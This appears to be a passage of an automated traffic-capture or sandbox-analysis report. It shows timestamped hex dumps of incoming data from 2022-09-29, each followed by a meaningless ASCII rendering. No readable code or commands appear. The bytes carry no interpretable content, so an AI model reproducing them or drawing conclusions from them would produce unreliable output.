                                                                                                                                                2022-09-29 12:51:33 UTC10078INData Raw: 84 8f f6 bd c9 a7 b1 be af 06 6a 08 e6 04 2a a4 1d 2e dc ff b4 85 3c 4b 20 38 64 a2 52 23 72 23 b5 db 83 64 b2 11 e3 45 bf 1e 6e b2 e4 76 24 28 a7 ab 4d 84 e2 1f 80 36 fd 1b 2b 77 ea 48 a6 63 7a 82 2e c9 4a a4 47 a6 07 08 a4 20 41 65 69 99 f5 91 a4 9a 42 61 30 a2 03 f6 c0 88 5a 5c 9c 1a b1 80 1b f5 16 61 10 02 cb 64 56 cd 03 14 39 a4 cd a0 9c 0e 51 29 36 5f 65 60 ee f5 ce 5e 25 71 22 18 b7 c1 b3 85 ab 42 62 f6 dc 05 82 18 4f a6 a1 90 36 99 56 4c 4c ae 8c 3a 4e 30 a2 ac 5c 21 75 07 f3 35 3d 5c 5a 49 85 d0 90 93 f7 b3 9d 01 7f 06 0c 3b 51 60 d1 2f 08 10 33 25 ac 04 d9 25 64 ff 06 8f 7b f8 3d bc f3 32 88 f1 c9 29 c2 2f c6 f5 34 20 a6 37 7f a2 66 c7 9f 01 a4 0b e2 d5 02 23 b1 f2 76 34 9f 29 1d 3b 7e 4b 43 ea 54 48 77 80 29 f4 73 ef bf 83 a8 d4 fd 6c 01 a1 2c
                                                                                                                                                Data Ascii: j*.<K 8dR#r#dEnv$(M6+wHcz.JG AeiBa0Z\adV9Q)6_e`^%q"BbO6VLL:N0\!u5=\ZI;Q`/3%%d{=2)/4 7f#v4);~KCTHw)sl,
                                                                                                                                                2022-09-29 12:51:33 UTC10094INData Raw: ab 30 0c 52 18 7d 2e ec db 29 24 12 47 29 6c 31 98 3f 00 bf ae 61 98 2e cd 95 3e 0e df 7a b0 62 b9 aa 1a 8e 25 c9 70 72 b9 13 0e 77 f2 0c 1f 29 e7 9e af ba 8d 49 5b c5 80 d2 5d 62 84 1c c4 86 07 5a 1b 57 ed ec 86 99 27 85 a9 e7 1a 32 a6 46 d8 92 8c 88 ff ab 51 9d 7b 79 f8 e9 54 ff 64 7e 21 f5 97 c8 3a a2 24 7f 7f 14 81 a6 4d b4 b1 68 3f 60 bb 1d b0 b7 72 1c d2 62 19 87 c1 2b f9 66 66 3a 7d dc ab 24 a3 9f 1d af 1e c8 e0 ad 1d 87 a6 90 08 70 20 f4 ac 5e c4 6a 4c 47 97 da 70 b4 1a 78 13 93 8c e4 e6 e3 c3 47 31 af 2e f2 b1 e3 f6 f0 fb eb 07 f5 47 62 9f 1f d0 de 25 f5 4c e6 2e 65 e1 11 87 bd f0 47 79 eb 32 cd e3 4f 92 ae b4 a9 36 f8 d4 6e cf af c2 d6 db ac 55 35 79 74 1e ba d0 b9 da 86 cb 85 b1 9d 54 bc ed 1a 0d c6 aa 8b 63 2a 6e ee 33 91 05 67 69 e9 58 f3 ad
                                                                                                                                                Data Ascii: 0R}.)$G)l1?a.>zb%prw)I[]bZW'2FQ{yTd~!:$Mh?`rb+ff:}$p ^jLGpxG1.Gb%L.eGy2O6nU5ytTc*n3giX
                                                                                                                                                2022-09-29 12:51:33 UTC10110INData Raw: 2b c6 75 f4 4a b3 a3 06 85 c7 9e 6b 7c 77 a7 b2 f7 75 cf 01 4c 8f 64 27 84 ac 13 79 72 26 51 2f cd b4 b2 97 8e 2a 04 3b 7f c1 65 bd ce c8 3b 2a a4 36 30 76 52 c6 8f f7 3a bb ae d6 5a 93 ed 61 90 a3 43 0a 29 c3 78 6a d5 26 94 00 ab 8b a6 c0 04 75 6b 31 5c c6 48 13 77 a3 69 f2 9a 87 d5 bb 13 ab 28 35 86 c8 d4 30 07 6b 71 3c 92 90 89 f9 bc 65 4b af 2c bb 80 ee 4d a1 7f 3b 8d e2 bf 42 f0 f2 a6 a8 f7 8f 18 cb 60 03 60 e6 b2 03 79 0d b3 d8 28 db 92 3a 88 da 9f 27 84 bf 93 07 30 17 95 61 d2 4e 2c 21 40 d8 de e1 d7 9b 80 49 3d ee b7 d1 15 dd 86 79 ff 07 20 15 97 fe 9c 85 ee 61 9f 7b 02 39 a1 63 56 42 3a 7d 8a 12 58 3e f6 47 4a 1c 54 a8 63 48 cc 30 fb 7e ed da 53 24 8e a9 79 68 ec 49 7b 88 ba b6 f3 3f 54 61 12 6b eb ea 8f ca 76 27 6c e5 c3 36 90 b9 63 48 8d e3 66
                                                                                                                                                Data Ascii: +uJk|wuLd'yr&Q/*;e;*60vR:ZaC)xj&uk1\Hwi(50kq<eK,M;B``y(:'0aN,!@I=y a{9cVB:}X>GJTcH0~S$yhI{?Takv'l6cHf
                                                                                                                                                2022-09-29 12:51:33 UTC10126INData Raw: 0b 1e b6 9f 95 a0 65 e6 59 b7 88 74 07 39 97 16 d6 5b ea 29 ec bb 65 cc 0d e9 18 1a bb ff 3a bf 4a 15 e9 aa 73 9e b3 e5 12 dd 59 1b be 18 c4 fc 0c 29 06 dc fd 7f 74 b4 05 b1 a1 17 24 2b b5 94 67 d2 44 7a b5 2b 17 54 fa e2 27 09 1d a2 6a 6e 64 7e 68 9f 0a f8 9f d2 99 e9 30 02 e5 61 7a ca 3d 9f e2 71 13 93 e8 a2 1d ea 7a 88 5d cf 1e e9 7e 74 b2 1c f9 2c cb 17 77 4c 7e 4f 52 e6 ab 12 d7 e1 35 35 35 e6 a5 65 99 82 6b 4c ac 4e 56 17 07 43 de 27 e7 61 4a 73 a2 36 17 49 ed 42 8d 0a 9a 45 f0 46 a8 3f d9 b0 e9 1d 47 20 60 07 62 15 32 7b 30 2f 9e 4f ca 97 14 a6 32 08 81 b8 4d 09 fb 84 21 11 fb c4 99 45 a7 18 b3 9c 30 cc 5a 38 3d 8a d1 cc 2c 07 e0 c9 68 60 da ec 0b 8f aa bf 55 8d da c9 c8 0a d4 39 02 ae 9c e5 3f 22 0c 69 6d ae 0f 0a 4e 77 bd 63 fb f4 d3 b9 ab 12 fe
                                                                                                                                                Data Ascii: eYt9[)e:JsY)t$+gDz+T'jnd~h0az=qz]~t,wL~OR555ekLNVC'aJs6IBEF?G `b2{0/O2M!E0Z8=,h`U9?"imNwc
                                                                                                                                                2022-09-29 12:51:33 UTC10142INData Raw: 44 af 80 01 79 f8 d8 19 3d 65 39 b1 c9 d3 f2 c5 c4 aa 7b 06 bb e1 a7 2a 9d 09 0e a8 e2 d7 c2 9a 50 49 7a 14 e0 c6 bf 84 5c 19 17 2f 6a 4a 25 8c 6d f7 53 52 ca 05 52 69 b9 84 77 53 9a 46 b4 ae 53 c2 13 52 39 99 a3 e3 8f b8 44 d1 1d 3c a8 11 8b f9 8f 17 9a 0e 32 c8 aa 7f 0d 15 a5 40 d6 60 f2 84 4a c1 98 7d 6e ae 6a 5d ab ee 7b 59 9f ad a8 cc 73 ff 5d 9c 1d ea f8 8f d3 6c 34 12 f1 78 d6 63 cb d8 09 3a aa 6c 12 b8 08 d1 65 8d 7c d9 c4 08 20 4f b9 99 b6 2e 78 09 68 f3 16 28 c2 4d 1f 21 2a 6e d7 5d 81 03 8e 5a 21 6a 29 09 a9 73 63 ab 4f ec e1 fb 7d 39 44 0c d5 d2 c7 ac 04 63 2e f5 0f 22 f0 10 9b ad ac 07 98 9e 0b be 76 8f 21 84 28 e9 0a 6c 71 8c 49 13 1d 56 e0 89 7f 95 e6 56 94 88 0d 45 6a 98 29 d5 1c ed 83 4b 55 4d 4d 75 d4 10 80 3a 1e 9c c5 ec 5c 46 68 93 cb
                                                                                                                                                Data Ascii: Dy=e9{*PIz\/jJ%mSRRiwSFSR9D<2@`J}nj]{Ys]l4xc:le| O.xh(M!*n]Z!j)scO}9Dc."v!(lqIVVEj)KUMMu:\Fh
                                                                                                                                                2022-09-29 12:51:33 UTC10158INData Raw: 30 b0 fe 31 ed da df e2 99 e3 b3 49 37 0c c0 23 be 61 b8 11 36 e3 46 00 af 80 d3 99 b5 d6 5c 8f 90 fc 93 97 a2 bc 61 9a bb 80 3e 85 42 53 97 3d d3 6c 9a e8 fe 88 84 35 8e d1 6b 31 16 c2 9b 41 f1 6e 09 53 94 80 8d a4 28 09 58 7f 33 ae e9 d6 73 d1 99 e8 7a b5 fa d8 79 b8 c6 cc e4 b9 5f 01 c0 96 f1 10 59 30 8c 4f f7 80 73 34 9c 2f 5c 75 80 a9 63 38 20 1c 9a 46 3b 2c 98 40 ba 12 35 86 6c 26 f7 f1 ef 79 86 a2 ba 68 6f 4a f8 74 05 97 91 4e ac 23 d6 a6 f8 35 9c 80 5c 4c 95 57 bd 15 f2 7e bf 79 08 cd 0f f3 6a 2b 6a 9b 59 97 ef 50 49 18 ff a6 ad d8 01 37 7d 1c 73 cc c7 26 75 19 40 50 24 8a b1 06 bc 28 70 bd 71 8f 73 80 80 b7 bf 3c 9b ef 03 30 8a 50 4e d1 41 59 f6 cb 06 38 7c be 3c 72 b8 8e f2 02 95 62 59 8b e0 85 f6 32 99 43 ab 38 cf 65 64 da 92 13 a3 92 d6 01 c1
                                                                                                                                                Data Ascii: 01I7#a6F\a>BS=l5k1AnS(X3szy_Y0Os4/\uc8 F;,@5l&yhoJtN#5\LW~yj+jYPI7}s&u@P$(pqs<0PNAY8|<rbY2C8ed
                                                                                                                                                2022-09-29 12:51:33 UTC10174INData Raw: 2f 8c 2e 98 b2 7f c1 11 dc 76 aa 03 d0 93 b7 4c 25 9c 65 2a c7 86 71 0f 99 ae ce cc 6b 7d 26 d4 9e b5 f0 36 f2 33 c6 9a e8 a8 df 42 2a d3 84 f3 c4 65 6f ea e8 bd 2f 8e 17 d8 64 1d 89 c1 7e be c5 18 91 25 15 45 e2 45 a6 4f 09 8c 7b 6c 5c d3 55 c7 fb 67 dc 74 0f aa 76 2a bf e2 99 3e 4b e0 94 0f 3c a6 58 a7 ef 53 3e 0c 73 0b b0 4b 7b 32 52 1f 88 3d d7 c7 16 02 14 ec 1c 4d 88 9e 7f 13 51 7e 4f 6d 3d 1c d7 1e 1b 21 37 53 6d 03 69 8f 03 a9 5b 29 42 8f bb 2c 63 57 c6 97 4a c6 72 e0 6c 63 13 0f 77 06 76 0a 85 76 f6 f3 34 c0 d5 e8 0c b5 65 07 bb 12 be 57 2f 61 59 3b fd 7d c1 87 aa 3f 75 a1 65 25 6f a4 d4 74 db 12 31 38 ac 17 e5 cf e2 5b a6 9e 5c bd fd 8e 8f 81 9e 5e 0d 1d 98 62 6c 0c 0b 6e 6e 15 1c d2 1b 6b 06 ad 49 8a 99 73 2c f6 bf 3d e3 43 b9 cd 10 37 9b fe f1
                                                                                                                                                Data Ascii: /.vL%e*qk}&63B*eo/d~%EEO{l\Ugtv*>K<XS>sK{2R=MQ~Om=!7Smi[)B,cWJrlcwvv4eW/aY;}?ue%ot18[\^blnnkIs,=C7
                                                                                                                                                2022-09-29 12:51:33 UTC10190INData Raw: 81 70 9a b9 48 5c 92 8d 0e 70 8d 4c b3 bc 58 18 ff f2 a8 4a 72 6b 67 b6 14 4a 54 aa f7 1d 85 50 ec ce 85 27 61 a5 bf df 2f 79 36 bc 3c fe 97 1c 06 3a c6 3e e7 8c 9b 8e 89 ce 8a 77 26 ca 7e 90 39 d1 86 e0 6a 85 9c 1a 05 1b 7a 96 90 14 2e b8 07 d4 6c 88 8b b7 b2 69 0c 7e 16 73 88 06 a5 a3 f6 fb 92 fd ec 71 e0 e7 d7 8a 8d 41 05 53 1e 82 2a 24 8b 15 63 66 db bf 34 c3 37 4b d2 48 07 5e c7 d1 a9 eb 0e b9 4d 75 77 ba a8 99 82 b9 6b 36 72 d5 11 c8 be ec 6e 6e a3 0a c4 79 9b c3 e1 40 23 05 83 cc a2 86 cf da 61 d4 9f 6b cf f1 eb d4 72 2d 59 ff 5c 0e 18 5c a8 87 63 c6 44 65 11 70 d2 ae d7 38 59 2c 8c 2e 87 08 c1 2c 0e 1d fa cc 4e 31 b9 0d 95 14 42 d0 72 0b 39 33 04 7b 22 8d 3f a6 01 a6 b7 6e 80 98 9f 2c b9 ad 55 9b b2 14 ee 4a a9 3c 9f 92 92 ab 65 f7 76 2a 14 03 14
                                                                                                                                                Data Ascii: pH\pLXJrkgJTP'a/y6<:>w&~9jz.li~sqAS*$cf47KH^Muwk6rnny@#akr-Y\\cDep8Y,.,N1Br93{"?n,UJ<ev*
                                                                                                                                                2022-09-29 12:51:33 UTC10206INData Raw: 16 7e f7 eb 3b 37 e0 cd 16 c7 6f ea 78 30 e0 dd 24 92 9e 42 25 53 71 13 12 5e 87 f2 de a1 12 9f ac dc b6 39 0c 7a 05 82 2b 54 84 bf 3c f6 46 5a e4 52 67 0e af 83 6e 9b 2d 30 86 cd 39 1c a2 4b 0e e2 14 df 32 4f d9 ea b4 ac 3c f4 e0 90 17 9e 94 0a eb db 09 06 ea f0 e6 b1 74 41 20 2e 72 c1 12 6f 6b bc e5 2c 3f f4 47 c2 fa 72 bd 6d 66 57 02 df 3f 18 e2 3d 29 ed b9 17 d7 66 98 b5 de d2 06 b0 ee 9e 57 1e 81 66 c8 ab 71 6c cc 4c 72 ee 42 3b cd a6 8d af 3b 8f 3b cd de d2 57 87 1a 2c 48 7b 9a 1e da af 0a 2b da ec b8 e6 35 2a bf 1e 7e 0d 55 6e 1a 37 cf e8 ac 26 c9 8b 99 9a 60 33 83 f3 75 c8 99 6b 34 dd b5 81 07 ad e9 4c 96 d9 b0 51 02 69 2a 83 fd ac 65 c1 fb 36 64 6a 1d 46 65 a1 fe 29 b5 0f 28 4c 81 68 b5 3e 49 a8 48 49 76 57 8b 00 50 72 fa e2 be 45 0b cd 64 45 a8
                                                                                                                                                Data Ascii: ~;7ox0$B%Sq^9z+T<FZRgn-09K2O<tA .rok,?GrmfW?=)fWfqlLrB;;;W,H{+5*~Un7&`3uk4LQi*e6djFe)(Lh>IHIvWPrEdE
                                                                                                                                                2022-09-29 12:51:33 UTC10222INData Raw: 61 14 74 b3 d5 8e 5b 78 d7 f6 83 16 ea 41 af c2 e5 48 38 8b 79 1f 9c 33 13 f0 d1 83 da 48 bc aa 2a f3 4c 05 a1 8b bb 00 ec a1 32 b3 61 96 85 4b 4b 9b 96 2c 0a ff 68 55 aa 58 79 7a ba d7 27 cc 77 fa 85 05 e3 08 cb f3 c4 d4 56 45 0c 57 6a 11 b3 24 0d 71 d0 4c 2c 0e f4 13 8f 79 6f 42 4a 44 11 f7 7f f6 00 84 ad 4b b6 be e4 96 cd 41 c9 87 1e 63 e4 43 97 be 64 d6 75 a2 60 07 4e f0 1c 66 9a 32 c4 2d 7c 27 9d d0 b8 e1 1f e1 16 18 43 6b 13 6b 67 e4 d9 ca b7 f5 7f 90 ae 78 d7 05 73 1e fc 8d 25 3b 9e ba 89 47 d5 f7 92 b6 1d b4 18 f0 82 5c fb 9e 31 2e f9 c4 85 5f be 30 23 c2 f9 32 60 ab 59 bb 5d 37 79 62 b3 3b d2 f1 44 6f 0e 29 a5 78 3c d6 71 a7 f9 05 2b 02 40 eb a4 d3 8c 2f d2 37 fc 9d f2 8e f3 85 05 3d ac 60 9d 8d 6d 52 2e 57 cd 64 c2 32 a1 00 16 e7 a3 ed 40 24 16
                                                                                                                                                Data Ascii: at[xAH8y3H*L2aKK,hUXyz'wVEWj$qL,yoBJDKAcCdu`Nf2-|'Ckkgxs%;G\1._0#2`Y]7yb;Do)x<q+@/7=`mR.Wd2@$
                                                                                                                                                2022-09-29 12:51:33 UTC10238INData Raw: ac 18 c7 b0 62 08 1b c1 57 ab 33 4f f2 a9 f1 21 83 1f 16 77 83 c0 28 66 2a 46 cb 04 62 60 ce 5d 8d 19 56 42 15 53 5b 7f 6e c7 8e 01 fe 38 63 b9 10 3a e9 80 7e 56 81 31 c7 14 56 7b ac 67 c0 7b 2d 14 a3 9e 79 95 3b 3e 86 7f 71 99 a4 c7 32 8a 36 47 80 50 38 56 c4 b6 65 ee 26 27 eb b7 5f 07 65 40 8b 82 00 e9 91 f6 0f 6c 75 b0 41 ed 54 3b ca 87 ac 77 ac 26 fc 40 36 5d 32 d6 0c 1b 69 b2 9b 3b 9c ad fa 52 0e 16 fa 95 41 59 94 00 1c ac d9 4d b0 89 6d 6e 9d 39 99 07 a4 1f 8b 18 c2 8f 0c 37 61 37 0f 14 2b 03 a8 0a 57 45 20 cb 81 7a bc 79 75 68 da 99 58 20 66 98 fe 9f 17 31 b3 e9 a3 41 d5 6b a5 68 95 a4 4f 74 e3 01 55 01 4f 50 7d 8a b5 67 19 b1 af fe 62 51 ba 96 12 52 50 75 02 73 7d 34 76 64 e3 a6 7f fa d5 5d 63 4b 07 10 f7 9a 10 f5 13 52 a8 bd 70 eb 00 a7 76 de 19
                                                                                                                                                Data Ascii: bW3O!w(f*Fb`]VBS[n8c:~V1V{g{-y;>q26GP8Ve&'_e@luAT;w&@6]2i;RAYMmn97a7+WE zyuhX f1AkhOtUOP}gbQRPus}4vd]cKRpv
                                                                                                                                                2022-09-29 12:51:33 UTC10254INData Raw: 47 b7 6c 46 ec 32 6b c1 a0 f4 ac b9 fe c2 32 b2 a7 a7 e1 26 7f b1 db 02 49 a1 6d 66 b4 bf 80 39 28 65 8a 32 d5 2d d2 1a 8c 9f 17 c8 cb 9f 8b 3e 00 02 c0 cf 29 43 0c 4a 3a 54 f8 44 7e 45 e3 9f 3a 78 14 45 7a 9c 6b 9e 1b 51 53 55 68 b3 04 8c 0b 4c 58 90 57 d5 6d 17 09 75 92 ca 4c 6d 67 ac b9 5e a1 19 0e a3 5b 51 c2 eb 05 66 be 26 46 fa b1 c9 99 63 2e c6 4d 44 82 e2 a7 e2 0b ca 28 6d d9 d5 09 3f db c9 76 ce 58 dc 60 30 99 ba 24 d6 2d a8 31 fd 4f 42 fb 52 84 bd 7c 77 a4 83 9b 4e b7 e2 34 64 60 88 2f 78 68 0f ca b1 de a2 21 1a 33 46 d6 7c 1a d8 aa 48 95 1a b5 01 32 05 a3 b3 e0 60 6a 45 ca 18 88 40 02 f6 b5 91 3b 83 e6 32 db 51 7b 10 53 2f fa 52 2c 1e f3 fd ef 59 94 ba e3 a3 2d fa b4 cc 45 53 01 16 5b d3 d4 9f be 90 f3 a1 86 d4 dc 58 06 4e 64 cd 87 c6 42 5a 7f
                                                                                                                                                Data Ascii: GlF2k2&Imf9(e2->)CJ:TD~E:xEzkQSUhLXWmuLmg^[Qf&Fc.MD(m?vX`0$-1OBR|wN4d`/xh!3F|H2`jE@;2Q{S/R,Y-ES[XNdBZ
                                                                                                                                                2022-09-29 12:51:33 UTC10270INData Raw: 14 d2 95 55 fe 13 d0 8e 2d 4a 37 7b 47 a5 14 6f d9 a7 25 5f 80 2b 05 6c 16 11 ea 40 a1 bc c7 7f 61 0f 57 c3 8c cc 5e f4 18 ad fc 66 21 ae c5 d4 5d 86 29 b9 93 3f f9 05 92 93 5b 25 08 6c de 7b 18 27 03 bf 93 85 09 c6 38 2b bc 71 6c 90 b5 f1 fc 83 da 5a ba ad 30 f9 ad 78 da 9e 67 0c 9e 64 7d d8 cc 70 5f 7e b1 e5 66 d4 54 bb ec e0 82 8e b3 58 f1 23 a8 3f ef 1a 63 65 03 a9 01 1b 1f e0 e1 62 cb 17 5d 74 2a 45 47 13 bb 6f 92 f4 02 fd 39 22 ef dd 5a 45 70 36 ad f6 ee 20 b3 d3 5e 30 e9 f1 87 5b 03 6e 78 0a 62 14 c3 89 49 eb ab c6 6e c9 75 1e 42 60 df 3a ba 23 cb 6f 4d 81 e8 81 d8 0f 92 fe 2b ab 47 c2 5d 7c 39 49 e5 30 a7 1a c8 21 3e af 5f d6 09 3b 24 4d 3f d8 99 09 28 a2 ce 24 e9 d5 c2 f9 bf 86 a4 ce 04 2e 38 c8 ed 3b 6c ad 4a 68 4a 74 7c de 2e 5a dc be 15 4d 95
                                                                                                                                                Data Ascii: U-J7{Go%_+l@aW^f!])?[%l{'8+qlZ0xgd}p_~fTX#?ceb]t*EGo9"ZEp6 ^0[nxbInuB`:#oM+G]|9I0!>_;$M?($.8;lJhJt|.ZM
                                                                                                                                                2022-09-29 12:51:33 UTC10286INData Raw: 1f 42 25 be b4 4f 28 71 d8 29 9a bb d5 46 4d 4d b3 0f cc a8 0d 73 4c ed 17 8a ff 00 05 5c da e7 b0 f3 93 93 dc 04 bd 48 36 ab 3d f8 c8 41 b0 66 d7 33 b1 7e d8 ce 08 8b ac 0d 57 eb 09 57 9e 1d a4 c6 07 46 8b 38 d4 9a f4 44 fc cb 9c 8d d1 f0 ad e4 68 b3 1f 02 0d a1 19 d0 31 43 61 3a d9 d7 d2 44 34 26 fc bc 30 ed 97 cf c4 86 0f e6 b5 e7 2b 19 a8 a3 a3 ba c2 a4 38 4d df f0 b9 78 4a b6 9a 04 51 15 c5 3b 32 5e 49 64 b4 74 74 2d 0c e5 90 d7 bc 46 63 98 4d 82 89 72 b9 67 a5 c9 40 53 ed e8 12 8e 0f a8 00 c7 58 ab af 4c 5e a3 11 55 3e 7a bf 54 91 82 68 b7 db 70 cf 26 a3 0c 9e 18 7f 1a 94 fe 34 da ca b5 ff 57 e4 17 66 d3 d0 48 37 6e a6 28 71 da e4 f2 67 23 da e7 6f 26 c0 b8 da 09 0b 5a c6 15 62 94 5e c0 65 af cd 6b 13 98 77 f4 cf 06 9b 66 0a 1a e2 10 9e 66 85 e1 ed
                                                                                                                                                Data Ascii: B%O(q)FMMsL\H6=Af3~WWF8Dh1Ca:D4&0+8MxJQ;2^Idtt-FcMrg@SXL^U>zThp&4WfH7n(qg#o&Zb^ekwff
                                                                                                                                                2022-09-29 12:51:33 UTC10302INData Raw: 72 d4 8a 31 95 37 c6 3a 44 44 34 35 2e 2e a1 65 dd 0c 09 ef 60 5b 0e 42 f4 01 f0 95 1d a6 f2 1f c7 b3 72 79 22 e7 86 1d c8 4f 55 f4 90 bc 14 f4 ee 9f e5 3c 78 ef 7d 53 e2 4f 2d ae f6 3b 60 ed 76 f6 6e fd 1e 64 15 76 5b 8d 33 fc 67 3b f0 13 b6 c4 4c 2a 68 dc 48 01 cc 08 ba 39 08 ac c6 89 a4 9d f5 a6 b3 1e ec 09 1e f9 60 be 7b 39 85 7e b6 81 ac eb fd db ac 79 d2 b6 28 1a fa af 44 76 9e 7d 07 43 a5 9e 65 6e ee 4e 0e 0b 7d c0 3a bd b8 0d 2e 06 e3 a4 37 67 25 f3 cd be 9b 99 d0 9f c0 bd e6 be c5 b8 cd 49 78 1c 70 7c 9b 40 ac 24 cc c3 43 0b 80 6d 2b 33 89 40 e3 f3 9f a2 32 47 16 0f b1 a0 13 bd c8 19 5d 70 e9 70 8d e3 9a 7c 2c ab 73 fb 84 c8 06 11 0f be ac 54 2b 5a c2 22 89 b5 e1 74 29 ab 87 89 57 d6 2e bf 5f fe 02 04 d5 a4 67 f7 1d a7 0e 43 0e 45 39 5e 6d 0e c3
                                                                                                                                                Data Ascii: r17:DD45..e`[Bry"OU<x}SO-;`vndv[3g;L*hH9`{9~y(Dv}CenN}:.7g%Ixp|@$Cm+3@2G]pp|,sT+Z"t)W._gCE9^m
                                                                                                                                                2022-09-29 12:51:33 UTC10318INData Raw: 0d f8 43 7c 39 ce 6d 88 96 9b 94 33 0c b9 bd 31 fb fe 00 aa 96 89 c3 17 a9 29 8e 3a 24 ef c4 22 fc 2f 50 9d ea 4d cb bb 7c a8 d4 fa 0b 05 d7 f4 d5 fd d5 0c 65 83 ec 6b 70 f3 84 33 a8 da fc d4 39 6a 42 0a 88 47 99 bb 66 fd 55 2f 57 b3 fc 7b 20 95 60 80 94 e7 3c 2e 5d 62 9d 02 87 d7 25 83 79 03 20 e4 fc 3f 17 25 4c 84 9a 05 d9 6c 39 47 a2 67 6f 65 2e 05 0b 26 98 59 a3 7f 56 ab c0 01 35 0c d6 f5 78 3f fa 44 9e 45 74 cd 2c 30 6c 32 e0 76 55 a5 04 4e f1 54 69 f7 17 11 f1 b9 35 31 77 27 aa ae 64 41 34 fc 86 11 d9 6e b9 e2 99 2c 65 26 bd 0c 77 3e a1 55 60 e7 0c 17 07 26 f6 09 6d 7d 9f 01 01 c5 45 fd 05 fc 33 24 6d 82 6b b9 4b 69 b6 4d 1b a0 df d3 d5 00 fc a8 92 f8 79 47 33 4e 2d e4 36 69 18 ca ed c2 1a 10 b5 21 07 44 f0 fe 3e 0f 04 60 8b db 1f 06 02 55 ac 67 e6
                                                                                                                                                Data Ascii: C|9m31):$"/PM|ekp39jBGfU/W{ `<.]b%y ?%Ll9Ggoe.&YV5x?DEt,0l2vUNTi51w'dA4n,e&w>U`&m}E3$mkKiMyG3N-6i!D>`Ug
                                                                                                                                                2022-09-29 12:51:33 UTC10334INData Raw: 88 b3 20 c6 00 64 36 df 30 0d d5 b7 2a 51 14 fc e5 ff d2 32 c0 fd e6 51 58 07 da 30 f3 57 68 42 49 23 20 0d e3 63 9f 34 e6 11 3d 09 7d 5f c0 96 87 fd c2 54 e7 87 f6 fa a9 4d 75 42 76 22 c6 1d 71 aa e3 1d 63 05 df b6 2e 52 08 d8 06 69 da 2f ca dd 01 58 34 95 a8 ca 10 24 e8 aa 88 21 0b f9 18 13 d8 88 ab 34 39 52 fd 44 d0 70 47 ef c4 3d 85 81 be 06 c5 78 8e b8 96 a1 d8 2e 2a c8 be e8 2d 04 93 8a dd 88 0e 77 27 fd 20 5d 8b 39 73 9e 5d b5 4b 02 23 51 85 d8 91 95 4d 50 71 9f b0 62 62 1b 8f 02 4a 52 27 f8 b4 4c 14 5b 18 61 cb cf 1e a6 c4 77 d1 5a e9 8e 96 7c de 06 aa c4 20 68 f8 cd e7 1c 34 a2 29 12 d6 cb 31 d0 36 27 78 cb d1 1f 72 13 1d 03 1e ff 25 41 78 a7 80 6e 7f e2 d9 f7 19 33 9d ff 95 6d 8b 73 cb 5b 0f 8f fa 69 4f 27 b0 fb 94 e2 03 de 1d 38 eb da 34 3c 23
                                                                                                                                                Data Ascii: d60*Q2QX0WhBI# c4=}_TMuBv"qc.Ri/X4$!49RDpG=x.*-w' ]9s]K#QMPqbbJR'L[awZ| h4)16'xr%Axn3ms[iO'84<#
                                                                                                                                                2022-09-29 12:51:33 UTC10350INData Raw: 80 71 ad b9 8b 5f 8e 3d 62 dd 25 2e 9a c0 62 12 5c 57 38 d7 61 45 76 50 c2 8a 26 ea 9a 79 13 70 7a a8 a0 7d d4 70 28 fd ef 21 78 38 fb 90 ac 58 07 2c 7b da e1 de a7 50 2d f4 e9 79 f5 ac 5d 4b ee f1 7e b2 dd aa ac a6 b7 bc 1f 5b 87 7a 1e a3 fd df 53 f6 3b 57 c9 c2 b5 4b e4 6c 16 8e fa 5e 4a 4d f6 3b 1f 15 ef a9 78 6d b5 f4 bb 6f f8 40 08 8f 61 0e b0 96 9f 33 1b 1a 9c ff 40 8b 59 80 ca 90 c2 e9 8c ed d2 6d cd c8 60 f7 22 ea 94 b3 d4 d0 c8 09 8d cb 22 c5 88 a3 99 e1 82 53 3a a3 91 23 4c 77 63 5a 4e 9f 20 ce 64 43 ad 26 88 c8 46 28 22 3f ee 37 51 37 85 66 04 71 a0 0d aa dc 02 53 f7 82 a3 d3 eb a3 59 2e c5 87 aa f3 6d d0 c4 b0 1e 20 6a 64 4f 06 67 10 57 88 a9 1b eb 8f 09 a4 8b a5 5f 2b 79 18 4d ec 2e b9 59 69 ad 49 0e de 2a b8 92 35 5a 8d cb b2 69 a9 6b 37 c8
                                                                                                                                                Data Ascii: q_=b%.b\W8aEvP&ypz}p(!x8X,{P-y]K~[zS;WKl^JM;xmo@a3@Ym`""S:#LwcZN dC&F("?7Q7fqSY.m jdOgW_+yM.YiI*5Zik7
                                                                                                                                                2022-09-29 12:51:33 UTC10366INData Raw: 10 89 84 c9 b9 23 0a 21 6d 0a 2b e9 3a 0e e5 37 12 39 de de 47 ca 3e 99 32 1a c1 4b 19 da 7e 56 c1 10 07 6a 20 65 39 87 13 58 50 20 80 a4 2f 2b 56 9c 54 f7 f0 64 df 79 17 9b 6e f2 c7 df 24 d4 10 2a 0b d6 df 0e 4c 03 51 9f 44 15 be de db 78 1f 8f d5 18 a9 da 92 d9 26 d1 52 1d 2e 46 36 3b f6 75 e0 d7 7b 55 1a 89 d4 a2 19 93 77 23 a4 77 5f 70 ee 68 12 b5 2a 86 fb eb e4 35 1a d8 1d f9 8f 3c 5d 8e 86 6d bc 78 f2 db 68 f8 be 56 e2 67 ee 23 a6 61 97 43 91 b0 7b 9a f9 71 c7 8b 1a 43 72 6a 35 3f 0b 68 d2 8d 6b 70 aa bf 17 9a 09 55 5d 9a 4d b7 54 fb 22 d9 5c 1e 26 c1 b1 ce ab bf 07 76 f6 67 0f 6e 2a d6 05 4f f3 1e bd 5c 37 56 00 19 80 1b 76 da 48 97 7d b8 5a cf 2a 08 05 eb f2 e8 4f 7a 45 48 9c 8b c7 eb 2a d3 35 03 b7 34 f7 ff 95 0f af d6 d9 97 db 33 78 5f a7 5c e8
                                                                                                                                                Data Ascii: #!m+:79G>2K~Vj e9XP /+VTdyn$*LQDx&R.F6;u{Uw#w_ph*5<]mxhVg#aC{qCrj5?hkpU]MT"\&vgn*O\7VvH}Z*OzEH*543x_\
